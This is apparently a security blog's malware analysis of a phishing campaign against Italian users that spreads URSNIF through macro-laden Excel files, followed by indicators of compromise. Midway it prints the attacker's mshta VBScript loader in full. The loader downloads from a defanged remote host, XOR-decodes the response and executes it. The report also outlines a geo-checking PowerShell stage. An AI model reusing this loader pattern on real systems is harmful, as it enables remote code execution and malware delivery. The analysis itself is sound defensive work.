Detailed Technical Analysis Report of Spam Campaign Delivers URSNIF Malware

Italian Spam Campaign Delivers URSNIF Malware Overview

Recently a new malware campaign has been seen that targets Italy country, in which an attacker is sending phishing emails with malicious links or an attachment of Office Document in the Email.

In case, if the Email contains a malicious link then it downloads the malicious office document when the person clicked on it.

In another scenario, Email contains an attachment of a malicious office document.

In both the scenario, the malicious document contains a malicious macro script that automatically downloads the additional malware on the user’s machine.

Get peace of mind! Get rid of malicious programs instantly

Free Malware Scan Compatible with Win 10,8.1,8 & 7

Flow Chart:

Flow Chart

Technical Analysis of Italy Spam Campaign

File Name: ft.n.20008735_07_2018.xls

MD5: 49C824A7C49B1D69DC96B73E0850CC64

File Type: XLSX

Spread Via: E-mail

Also, Read: Detailed Technical Analysis Report of Danse Bank Phishing Campaign

Detail Description Italy Spam Campaign with Screenshots

During execution of ft.n.20008735_07_2018.xls, it launches Microsoft Excel application

By default, Microsoft Office Application has turned on the Protected Mode Feature & Also Disabled the Macro’s for security purposes.

In case, if the user disabled the protection mechanism & enabled the macro’s feature then the warning message notification didn’t pop up. And it will harm your system.

So, it’s always recommended to never disable the protection mode.

As shown below, Enable Content Button, it shows another warning message (“Macros have been disabled”).

Macro Disabled Warning

Figure 1 Enable Content Warning

In case, if the user clicks on the Enable Content button or doesn’t using Microsoft Default Protected View Mode, Malicious macro will automatically get started in the background.

As shown below, Excel.exe creates several processes

Figure 2 Process Tree

As shown below, ft.n.20008735_07_2018.xls contain malicious macro which is not clearly visible and understandable by the normal user.

Below macro code has Sub Workbook_Open() function which means on opening the Workbook, the malicious macro code will be get activated.

macro code

Figure 3 Macro Code

By analyzing the above macro code, we came to know that it’s runs the malicious PowerShell script in the background.

As shown below, it is clearly visible that the bad actor hides the “column A” that contains the actual code. Once we unhide the column we can easily see the malicious code, which is placed by the attacker in the spreadsheet.

Figure 4 Hidden Code

As shown below following is the VB Script code which is executed with the help of mshta.exe; mshta.exe basically runs the Microsoft HTML Application, responsible for executing HTA files in the operating system.

mshta vbscript:execute("On Error Resume Next:Set a=CreateObject(""MSXML2.ServerXMLHTTP.6.0""):a.setOption 2,13056:while(Len(b)=0):a.open""GET"",""hxxps://pagamento[.]us/abcd"",False:a.send:b=a.responseText:wend:k=""MDX01"":for i=0to Len(b)-1Step 2:c=c&Chr(Asc(Chr(""&H""&Mid(b,i+1,2)))xor Asc(Mid(k,((i/2)mod Len(k))+1,1))):Next:ExecuteGlobal c:")(window.close)"

As shown above, VB script attempts to connect (“hxxps://pagamento[.]us/abcd) URL.

That downloads the “abcd”(MD5: 502C874EFC385C925C6F02DC3C0555DB) file on the system which contains the shellcode and using XOR function in the VB Script to decode it.

Shellcode

Figure 5 Shell Code

As shown below, macro code launches the PowerShell which tries to connect with the (hxxps://pagamento[.]us/abc) and download the “ABC” (PowerShell Script file) (MD5: 7C93E3553CC4D1EEC930DC72ECF94985) that checks the IP part.

If the user is from the Italy, in that case the malware will download otherwise not.

IP Check

Figure 6 Malicious JSON

As shown above, the above PowerShell code tries to download the “relate.xlsx” which is actually a binary file and save with the name of helpcontrol.exe on the victim machine. If the person belongs to Italy, script will automatically download the payload into %temp% folder based on their matching IP Country criteria.

PowerShell Download

Figure 7 Download Payload

Once the malware is downloaded onto the victim machine it creates the following further processes.

SecondProcessTree

Figure 8 Process Tree

Helpcontrol.exe also contains Anti-Debugging Techniques. It has following API’s

Isdebuggerpresent

GetTickCount

HeapFlags

IOC’s

Associated Hash

49C824A7C49B1D69DC96B73E0850CC64

502C874EFC385C925C6F02DC3C0555DB

7C93E3553CC4D1EEC930DC72ECF94985

Associated URL

hxxps://pagamento[.]us/abcd

hxxps://pagamento[.]us/abc

hxxp://ipinfo.io/json
hxxp://sev[.]sunballast[.]com/

hxxp://myip.opendns.com

hxxp://sev.trampcoproject.eu

hxxp://sev.fm604.com

Associated Files Created by HelpControl.exe

%AppData%\Local\Temp\~DF333DF7D082B63E5A.TMP